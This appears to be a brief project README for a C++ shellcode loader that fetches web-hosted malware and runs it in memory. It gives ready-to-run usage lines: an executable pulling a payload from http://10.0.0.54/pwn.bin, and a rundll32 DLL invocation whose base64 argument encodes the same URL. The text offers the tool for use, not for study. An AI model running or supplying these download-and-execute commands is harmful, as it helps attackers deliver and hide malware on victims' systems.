Custom shellcode loader written in C++. This will grab your web hosted malware and run it in memory.
This project is password protected at this time.
RRL.exe will take the remote bin file as a parameter like:
RRL.exe http://10.0.0.54/pwn.bin
This can also be run as a DLL using a base64 encoded parameter:
rundll32.exe RRLDLL.dll,Driver aHR0cDovLzEwLjAuMC41NC9wd24uYmluCg==